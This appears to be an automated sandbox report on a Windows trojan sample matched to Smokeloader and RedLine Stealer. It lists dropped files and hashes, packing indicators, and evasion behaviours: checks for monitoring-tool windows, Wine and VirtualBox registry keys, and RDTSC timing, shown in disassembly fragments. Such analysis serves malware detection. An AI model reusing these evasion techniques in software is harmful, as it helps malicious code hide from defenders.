Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00403D40 0_2_00403D40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402EE0 0_2_00402EE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00404F70 0_2_00404F70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00410940 0_2_00410940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041A346 0_2_0041A346
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040EBC7 0_2_0040EBC7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00415E59 0_2_00415E59
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040B6D0 0_2_0040B6D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040EF09 0_2_0040EF09
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041572E 0_2_0041572E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_1000E184 0_2_1000E184
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_100102A0 0_2_100102A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 0_2_005E4832
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005EE957 0_2_005EE957
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004739CC 0_2_004739CC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004A31D9 0_2_004A31D9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004BA9F0 0_2_004BA9F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005EB19F 0_2_005EB19F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005DB185 0_2_005DB185
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004CAA2A 0_2_004CAA2A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005DDAAB 0_2_005DDAAB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00503B78 0_2_00503B78
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005D8BFE 0_2_005D8BFE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005D7397 0_2_005D7397
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E7CB0 0_2_005E7CB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E2D44 0_2_005E2D44
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005DF577 0_2_005DF577
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00544756 0_2_00544756
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E97EC 0_2_005E97EC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00473F82 0_2_00473F82
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0067A866 0_2_0067A866
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0066B4C9 0_2_0066B4C9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006FFCAE 0_2_006FFCAE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A251D7 0_2_04A251D7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A2EE2E 0_2_04A2EE2E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A23FA7 0_2_04A23FA7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A35995 0_2_04A35995
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A251D7 0_2_04A251D7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A2B937 0_2_04A2B937
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A2F170 0_2_04A2F170
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A30BA7 0_2_04A30BA7
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1] F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1] 614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 04A2AA07 appears 35 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 10003160 appears 34 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 0040A7A0 appears 35 times
One or more processes crash
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7312 -s 644
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000003.1664905418.0000000005C5B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameY-Cleaner.exe4 vs file.exe
Source: file.exe, 00000000.00000003.1664678591.0000000005419000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs file.exe
Source: file.exe, 00000000.00000003.1665195606.000000000541A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1949284118.0000000004940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: Y-Cleaner.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe Static PE information: Section: ZLIB complexity 0.9946797040870489
Source: file.exe Static PE information: Section: egpglfrh ZLIB complexity 0.9921220677067892
Source: classification engine Classification label: mal100.troj.evad.winEXE@2/15@0/1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402A50 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 0_2_00402A50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04948464 CreateToolhelp32Snapshot,Module32First, 0_2_04948464
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401970 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance, 0_2_00401970
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\add[1].htm Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7312
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user~1\AppData\Local\Temp\F4wAzFA73Du5NVFF3Wt42 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Command line argument: nosub 0_2_004087E0
Source: C:\Users\user\Desktop\file.exe Command line argument: mixtwo 0_2_004087E0
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7312 -s 644
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: Cleaner.lnk.0.dr LNK file: ..\AppData\Local\Temp\F4wAzFA73Du5NVFF3Wt42\Y-Cleaner.exe
Source: file.exe Static file information: File size 1998848 > 1048576
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: file.exe Static PE information: Raw size of egpglfrh is bigger than: 0x100000 < 0x1a5a00

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;egpglfrh:EW;zosqaizp:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Binary contains a suspicious time stamp
Source: Y-Cleaner.exe.0.dr Static PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: dll[1].0.dr Static PE information: real checksum: 0x0 should be: 0x400e1
Source: Bunifu_UI_v1.5.3.dll.0.dr Static PE information: real checksum: 0x0 should be: 0x400e1
Source: soft[1].0.dr Static PE information: real checksum: 0x0 should be: 0x170243
Source: Y-Cleaner.exe.0.dr Static PE information: real checksum: 0x0 should be: 0x170243
Source: file.exe Static PE information: real checksum: 0x1ea223 should be: 0x1ef001
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: egpglfrh
Source: file.exe Static PE information: section name: zosqaizp
Source: file.exe Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040A237 push ecx; ret 0_2_0040A24A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00421B7D push esi; ret 0_2_00421B86
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_1000E891 push ecx; ret 0_2_1000E8A4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00475869 push ss; retf 0_2_0047586A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push eax; mov dword ptr [esp], ecx 0_2_005E483F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push eax; mov dword ptr [esp], ecx 0_2_005E4893
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push ebx; mov dword ptr [esp], edi 0_2_005E48A6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push eax; mov dword ptr [esp], edx 0_2_005E48AA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push ebx; mov dword ptr [esp], edi 0_2_005E48BE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push 3CF76B9Ch; mov dword ptr [esp], esi 0_2_005E4973
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push eax; mov dword ptr [esp], ebp 0_2_005E49AB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push edi; mov dword ptr [esp], ecx 0_2_005E4AF1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push ebx; mov dword ptr [esp], 5F4D52D7h 0_2_005E4BB2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push 56102779h; mov dword ptr [esp], edx 0_2_005E4BF6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push ebx; mov dword ptr [esp], 596F2651h 0_2_005E4C4E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push ecx; mov dword ptr [esp], edx 0_2_005E4C9C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push 4C696F00h; mov dword ptr [esp], edx 0_2_005E4CA8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push 49912876h; mov dword ptr [esp], ecx 0_2_005E4D3B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push ecx; mov dword ptr [esp], 7C970B3Eh 0_2_005E4DD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push 59302537h; mov dword ptr [esp], ecx 0_2_005E4E20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push edi; mov dword ptr [esp], 068C6F66h 0_2_005E4E45
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push ecx; mov dword ptr [esp], esi 0_2_005E4E80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push edi; mov dword ptr [esp], ebp 0_2_005E4EBB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push esi; mov dword ptr [esp], ebx 0_2_005E4EC2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push 034D7211h; mov dword ptr [esp], edx 0_2_005E4EF2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push edi; mov dword ptr [esp], edx 0_2_005E4F5F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push 4B32AC45h; mov dword ptr [esp], ecx 0_2_005E4F67
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push edi; mov dword ptr [esp], 7FEFB363h 0_2_005E4F81
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push 65535FD9h; mov dword ptr [esp], ebx 0_2_005E4FD6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push 24A76596h; mov dword ptr [esp], eax 0_2_005E500B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E4832 push ebx; mov dword ptr [esp], 6065C109h 0_2_005E500F
Source: file.exe Static PE information: section name: entropy: 7.939044986237492
Source: file.exe Static PE information: section name: egpglfrh entropy: 7.949780643963927
Source: Y-Cleaner.exe.0.dr Static PE information: section name: .text entropy: 7.918511524700298
Source: soft[1].0.dr Static PE information: section name: .text entropy: 7.918511524700298
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1] Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1] Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\F4wAzFA73Du5NVFF3Wt42\Bunifu_UI_v1.5.3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\F4wAzFA73Du5NVFF3Wt42\Y-Cleaner.exe Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1] Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1] Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F448C second address: 5F44A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7534h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F44A4 second address: 5F44B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E64DC24BFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E27E7 second address: 5E27FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F6E644F752Fh 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E27FE second address: 5E2804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E2804 second address: 5E2815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 jc 00007F6E644F752Eh 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F3809 second address: 5F380E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F380E second address: 5F381E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6E644F7526h 0x0000000a pop edi 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F3DAB second address: 5F3DAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F5748 second address: 5F574C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F574C second address: 5F5795 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6E64DC24B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F6E64DC24B8h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 jg 00007F6E64DC24BEh 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e push eax 0x0000001f push eax 0x00000020 jns 00007F6E64DC24B6h 0x00000026 pop eax 0x00000027 pop eax 0x00000028 mov eax, dword ptr [eax] 0x0000002a push edx 0x0000002b jnl 00007F6E64DC24B8h 0x00000031 pop edx 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 jc 00007F6E64DC24CAh 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F5795 second address: 5F57CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E644F752Ch 0x00000009 popad 0x0000000a pop eax 0x0000000b mov dword ptr [ebp+122D3240h], edx 0x00000011 lea ebx, dword ptr [ebp+124555A9h] 0x00000017 mov ecx, dword ptr [ebp+122D31BCh] 0x0000001d xchg eax, ebx 0x0000001e jmp 00007F6E644F752Ch 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F57CC second address: 5F57D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F57D2 second address: 5F57D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F57D7 second address: 5F57E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F6E64DC24B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F57E1 second address: 5F57E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
